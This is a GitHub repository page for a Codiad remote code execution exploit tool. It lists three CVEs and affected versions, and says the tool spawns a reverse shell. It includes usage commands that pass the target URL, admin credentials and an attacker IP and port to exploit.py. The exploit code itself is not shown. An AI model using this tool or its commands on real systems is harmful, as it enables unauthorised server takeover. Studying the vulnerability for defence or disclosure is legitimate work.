Skip to content

WangYihang/Codiad-Remote-Code-Execute-Exploit

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
img
 
 
 
 
 
 

Codiad-Remote-Code-Execute-Exploit

Description

A simple exploit to execute system command on Codiad This tool will exploit the vuln Codiad application to get a reverse shell

CVE

  • CVE-2017-11366
  • CVE-2017-15689
  • CVE-2018-14009 (0 Day exploitation)

Effected Version

<=2.8.4 (latest version)

Effected Environment

Windows
Linux

Usage :

Usage : 
        python exploit.py [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
        python exploit.py [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
Example : 
        python exploit.py http://localhost/ admin admin 8.8.8.8 8888 linux
        python exploit.py http://localhost:8080/ admin admin 8.8.8.8 8888 windows
Author : 
        WangYihang <wangyihanger@gmail.com>

Example videos

Example GIFs

Windows

Windows

Linux

Linux

Acknowledgement

@mhaskar (Give suggestions for Windows platform exploitation)

About

A simple exploit to execute system command on codiad

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages